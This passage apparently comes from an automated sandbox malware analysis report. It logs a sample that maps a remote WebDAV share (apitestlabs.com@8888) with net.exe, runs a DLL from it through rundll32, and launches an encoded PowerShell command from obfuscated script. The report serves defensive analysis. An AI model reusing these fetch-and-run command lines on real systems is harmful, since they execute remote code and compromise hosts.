                  Commandline:"C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\
                  Imagebase:0x7ff70bb60000
                  File size:59'904 bytes
                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:5
                  Start time:05:28:20
                  Start date:29/10/2024
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,Entry
                  Imagebase:0x7ff6be490000
                  File size:71'680 bytes
                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Call Graph

                  • Executed
                  • Not Executed
                  callgraph clusterC0 clusterC2C0 E1C0 entry:C0 F3C2 Function E1C0->F3C2

                  Script:

                  Code
                  0
                  bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                    1
                    bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                      2
                      bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                        3
                        bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                          4
                          bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                            5
                            bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                              6
                              bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                7
                                bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                  8
                                  bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                    9
                                    bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                      10
                                      bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                        11
                                        bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                          12
                                          bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                            13
                                            bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                              14
                                              bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                15
                                                bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                  16
                                                  bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                    17
                                                    bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                      18
                                                      bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                        19
                                                        bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                          20
                                                          bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                            21
                                                            bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                              22
                                                              bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                23
                                                                bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                  24
                                                                  bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                    25
                                                                    bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                      26
                                                                      bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                        27
                                                                        bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                          28
                                                                          bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                            29
                                                                            bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                              30
                                                                              bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                31
                                                                                bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                  32
                                                                                  bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                    33
                                                                                    bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                      34
                                                                                      bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                        35
                                                                                        bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                          36
                                                                                          bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                            37
                                                                                            bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                              38
                                                                                              bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                39
                                                                                                bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                  40
                                                                                                  bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                    41
                                                                                                    bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                      42
                                                                                                      bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                        43
                                                                                                        bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                          44
                                                                                                          bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                            45
                                                                                                            bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                              46
                                                                                                              bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                                47
                                                                                                                bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                                  48
                                                                                                                  bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                                    49
                                                                                                                    bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                                      50
                                                                                                                      bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                                        51
                                                                                                                        bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                                          52
                                                                                                                          bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                                            53
                                                                                                                            bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                                              54
                                                                                                                              bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                                                55
                                                                                                                                bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                                                  56
                                                                                                                                  bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                                                    57
                                                                                                                                    bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                                                      58
                                                                                                                                      bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                                                        59
                                                                                                                                        bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                                                          60
                                                                                                                                          bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                                                            61
                                                                                                                                            bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                                                              62
                                                                                                                                              bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoe...
                                                                                                                                                63
                                                                                                                                                Function ( '' + bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqd...
                                                                                                                                                • Function("return this") ➔ function anonymous()
                                                                                                                                                • () ➔
                                                                                                                                                • Windows Script Host.CreateObject("WScript.Shell") ➔
                                                                                                                                                • run("powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAA...",0,false) ➔ 0
                                                                                                                                                Reset < >
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.2161192562.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffd345b0000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                  • Instruction ID: e0f8365b16397456555a3586aef99a22a5c7f1437f2a0f879beee55bc7f743ae
                                                                                                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                  • Instruction Fuzzy Hash: 5301677121CB0C4FD744EF0CE451AA6B7E0FB95364F50056DE58AC3661DA36E882CB45
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.2161192562.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffd345b0000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f277a4835ba9f6fcf4e6a2306cf547fac18fd842d15375f5f44cce5ff39460a4
                                                                                                                                                  • Instruction ID: 89665095f9d0812edd31587d73252877aac6c1c4ee303a4af893ec1392c16bc1
                                                                                                                                                  • Opcode Fuzzy Hash: f277a4835ba9f6fcf4e6a2306cf547fac18fd842d15375f5f44cce5ff39460a4
                                                                                                                                                  • Instruction Fuzzy Hash: 0032AF67E0E7C20FE313966958B90D57FA0EF5326470900BBD294CB0D3ED5DA80AA7B1